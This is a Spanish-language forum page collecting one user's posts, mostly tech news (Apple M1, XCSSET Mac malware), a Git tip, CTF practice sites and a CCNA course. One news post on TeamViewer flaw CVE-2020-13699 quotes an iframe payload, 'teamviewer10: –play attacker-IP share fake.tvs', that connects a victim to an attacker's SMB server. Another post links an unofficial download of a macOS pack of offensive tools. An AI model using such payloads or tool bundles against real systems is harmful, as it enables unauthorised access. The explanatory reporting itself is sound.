Mostrar Mensajes

Esta sección te permite ver todos los mensajes hechos por este usuario, recuerda que solo puedes ver los mensajes en áreas en donde tu tienes acceso.


Temas - Kr34t0r

Páginas: [1]
1
Noticias / Apple estrena sus primeros Mac con procesador propio, el M1
« on: 15 Noviembre de 2020, 01:06 pm »
Veamos que se traen estos muchachos buenos.

Cita
"Apple presentó este martes sus primeros ordenadores con procesadores de fabricación propia, los llamados M1, que sustituyen a los de Intel y estarán presentes en los tres nuevos ordenadores de la compañía: MacBook Air, MacBook Pro y Mac Mini.

El procesador central (CPU) es de ocho núcleos, cuatro de ellos de alto rendimiento y cuatro de bajo consumo; el gráfico (GPU) también tiene ocho núcleos, mientras que el neuronal, Neural Engine, utilizado para tareas de aprendizaje automático –como el reconocimiento de voz o el procesamiento de imágenes–, es de 16 núcleos."

Según dicen que las nuevas máquinas correrán más de 3 veces a su velocidad actual, sobre todo en el procesado de imágenes. Imagínate con discos SSD y su nuevo OS X Big Sur, espero no defrauden.

Lo único preocupante, es que una gran cantidad de usuarios apple quedarán fuera de este cambio, por un lado, el elevado costo de los nuevos equipos y por otro lado, su nuevo OS X que está disponible desde MacBook Pro año 2013 en adelante (es una pena, quedé fuera de todo esto).

Saludos bombercodes!!


2

Un fallo en TeamViewer permite el acceso de intrusos.

Es una realidad que en muchas ocasiones surgen fallos de seguridad que afectan a todo tipo de software que utilizamos en nuestro día a día. Pueden comprometer nuestra privacidad y poner en riesgo los dispositivos. Estas vulnerabilidades generalmente reciben actualizaciones por parte de los desarrolladores. Eso es lo que ha ocurrido en este caso.

Desde TeamViewer se han apresurado en lanzar un parche para corregir este importante fallo. La vulnerabilidad ha sido registrada como CVE-2020-13699 y ha sido calificada de alta gravedad.

Para ejecutar un ataque, un usuario necesitaría navegar a una página maliciosa que carga un iframe en el navegador web, posiblemente oculto o tan pequeño como un píxel, para evitar ser visto por un intruso. El iframe se carga a sí mismo usando el esquema de URI «teamviewer10:», que le dice al navegador que inicie la aplicación TeamViewer instalada en el equipo.

Estos esquemas de URI personalizados son utilizados por aplicaciones instaladas localmente que permiten al usuario iniciarlos desde su navegador. Por ejemplo, las URL que comienzan con «skype:» en el navegador iniciarían Skype. Otras aplicaciones de uso común como Slack, Zoom y Spotify usan estructuras de URI similares.

Lo que haría el atacante para aprovechar esta vulnerabilidad de TeamViewer, es establecer el atributo src del iframe en ‘teamviewer10: –play attacker-IP share fake.tvs’. Este comando lo que hace es que la aplicación de TeamViewer que esté instalada se conecte al servidor del atacante a través del protocolo SMB.

Hay que tener en cuenta también que un posible atacante no necesitaría conocer la contraseña del usuario. Podrían ser autenticados de forma automática y lograr así acceso.

Desde TeamViewer indicaron que este problema afectaba a varias versiones de esta herramienta para Windows. Concretamente afecta a las versiones 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 y 15.8.3. Sin embargo ya han lanzado el parche para todas ellas.

3
Noticias / Distribución del malware XCSSET para usuarios de Mac
« on: 19 Agosto de 2020, 05:12 pm »
Una investigación de TrendMicro, una campaña dirigida a usuarios de Mac está distribuyendo el malware XCSSET que tiene, entre otras, la capacidad de inyectar diferentes payloads en el navegador Safari, propiciando el robo de contraseñas, datos financieros y personales, así como la ejecución de ransomware.

La manera de propagación es poco usual, ya que utiliza proyectos de Xcode, una suite de desarrollo para dispositivos de Apple. El proyecto de Xcode es infectado con código malicioso, que se ejecuta durante la compilación.

El riesgo aumenta cuando los desarrolladores afectados comparten sus proyectos en plataformas como Github, lo que afecta a otros desarrolladores, que dependen de estos repositorios para sus propios proyectos.

El payload inicial viene en forma de ejecutable Mach-O, cuyo único cometido es el de contactar con el servidor de control (C2), para posteriormente descargar y ejecutar una segunda fase, en formato AppleScript, que contiene la mayor parte del código malicioso.

Tras una recopilación inicial de información del sistema, comienza con el verdadero objetivo. El malware genera un paquete de aplicación, que simula ser una aplicación legítima, como puede ser el navegador Safari, reemplazando el icono de la misma, de manera que los usuarios, al abrirla, están en realidad ejecutando el malware.

Una vez activo, el malware es capaz de desplegar una serie de módulos específicos, para tomar posesión de navegadores, robar información de otras aplicaciones, ejecutar ransomware. De acuerdo con el informe de Trendmicro, utiliza una vulnerabilidad 0-day del Data Vault de macOS, que le permite acceder a las cookies del navegador, lo que permitiría a su vez suplantar al usuario en numerosos servicios web en los que estuviese en sesión.

fuente: https://unaaldia.hispasec.com/

4
Mac OS X / Set de herramientas de hacking K0sasp
« on: 10 Agosto de 2020, 11:39 pm »
De seguro debe haber algún interesado en el hacking y que ademas tenga un gusto por la manzanita. Hay veces que nos encontramos con errores al compilar, instalar y ejecutar este tipo de herramientas. Debido a esto nace K0sasp, una serie de herramientas compatibles con sistemas macOS. Más de 150 tipos de herramientas distintas que se instalan de forma automatizada.

Las herramientas se instalan en un directorio llamado "Kontrol0-Security Auditor Software Pack" por lo que para desintalar, solo bastaría con arrastrar la carpeta a la papelera y listo. Aunque estos chicos la pensaron y nos dejaron un desintalador para eliminar todo eventual residuo que pueda dejar.

Listado de Herramientas

Information Gathering
    ✓    Amap
    ✓    Automater
    ✓    CaseFile
    ✓    arpscan
    ✓    dnmap
    ✓    Fierce
    ✓    GoLismero
    ✓    hping3 
    ✓    Maltego Teeth
    ✓    masscan
    ✓    Nmap
    ✓    Zenmap
    ✓    know-scan
    ✓    Recon-ng
    ✓    theHarvester
    ✓    URLCrazy

Network Tools
    ✓    Autossh
    ✓    SET
    ✓    Exploit pack
    ✓    search-exploits

Forensics Tools
    ✓    pdf-parser
    ✓    pdfid
    ✓    peepdf
    ✓    OSXAuditor-master
    ✓    Binary Cookie reader

Web Applications
    ✓    Burp Suite
    ✓    nikto
    ✓    DirBuster
    ✓    fimap
    ✓    jSQL
    ✓    sqlmap
    ✓    Vega
    ✓    Wfuzz
    ✓    mitmproxy
    ✓    mitmdump
    ✓    zaproxy
    ✓    webscarab
    ✓    wapiti
    ✓    SQL injector

Stress Testing
    ✓    SlowHTTPTest
    ✓    THC-SSL-DOS

Sniffing & Spoofing
    ✓    Cocoa Packect Analyzer
    ✓    sslstrip
    ✓    Wireshark
    ✓    tcpdump

Password Attacks
    ✓    crunch
    ✓    hash-identifier
    ✓    THC-Hydra
    ✓    pw-inspector
    ✓    John the Ripper
    ✓    Ncrack
    ✓    phrasendrescher
    ✓    RSMangler
    ✓    pipal

Maintaining Access
    ✓    tunna
    ✓    sbd
    ✓    Weevely

Reporting Tools
    ✓    KeepNote
    ✓    MagicTree

Link de descarga: https://mega.nz/file/L4gHhZJL#PQ8C4E07xJXTSrcZYwgbInRZI0DJ7H0w8EjFltJO9Bc

Fuente:
Cita
http://k0sasp.kontrol0.com/home/home2

5
Mac OS X / Instalación Git bash
« on: 10 Agosto de 2020, 10:19 pm »
Que tal gente, hoy dejo un pequeño tips.

Cita
Git es un software de control de versiones diseñado por Linus Torvalds, pensando en la eficiencia y la confiabilidad del mantenimiento de versiones de aplicaciones cuando éstas tienen un gran número de archivos de código fuente.

Instalaremos el control de versiones Git en nuestro sistema OS X. Si bien es cierto el proceso es muy simple, pero en lo simple la gente se complica  :P.

Vamos al grano....

1.- Abrimos nuestro Spotlight con CMD+barra espaciadora, escribimos "terminal" (sin comillas) y presionamos enter.
2.- Escribir "git" (sin comillas).
3.- Se abre una ventana (El comando git requiere herramientas para desarrolladores de línea de comandos y bla..bla..bla....). Seleccionas la opción "Instalar".
4.- Aceptas el contrato de licencia y espera a que termine la instalación.

Eso es todo señores, dije que era fácil!!

Los comandos para manejar git lo dejamos para la próxima.

 

6
Sitios web donde podrás poner a prueba tus habilidades de "hacker" desde lo mas básico, hasta lo mas avanzado. Saludos !!

Hacklabme - http://ctf.hacklabme.me
Hack the box - https://www.hackthebox.eu
Gf0s - http://labs.gf0s.com/
CTFTime - https://ctftime.org
Cydefe - https://labs.cydefe.com/
Hacking-lab - https://www.hacking-lab.com/index.html
HackThisSite - www.hackthissite.org
Atenea - https://atenea.ccn-cert.cnies
CtfLearn - https://ctflearn.com
Root-me - http://www.root-me.org

7
Redes y Comunicaciónes / Curso CCNA1 - Primera parte
« on: 15 Noviembre de 2014, 02:29 pm »


Que tal amigos, como les había prometido hace algunos días, paso a dejar este excelente curso CCNA1 dictado por el docente Paulo Colomés de la Universidad tecnológica Inacap Chile.
Estos videos corresponden a los cursos de instructor CCNA dictados por la Academia de Networking de Cisco perteneciente a la Universidad Tecnológica de Chile INACAP.

  • Instructor para CCNA, CCNA Security, CCNP.
  • Certificaciones CCNA, CCAI, RHCT, RHCSE

El curso está orientado para futuros instructores de CCNA, y es un excelente punto de partida para iniciarse en redes, contiene ejemplos muy claros acompañados de analogías, lo que hace que sea un curso interactivo, fácil de entender y aprender.
Un viaje intenso por las dos gigantes arquitecturas de redes: modelos OSI - TCP/IP, pinceladas a las diferentes topologías de redes, etc.
Aqui dejo este importante hilo de conocimiento que les será útil en sus diferentes asignaturas en la Universidad, saludos. 

MUY RECOMENDADO BY Kr34t0r!

CCNA1 - Clase 1: Comunicándose por la red

CCNA1 - Clase 2: Funcionalidad de la Capa y Protocolos de Aplicación

CCNA1 - Clase 3: Capa de Transporte del Modelo OSI

CCNA1 - Clase 4: Capa de Red del Modelo OSI

Páginas: [1]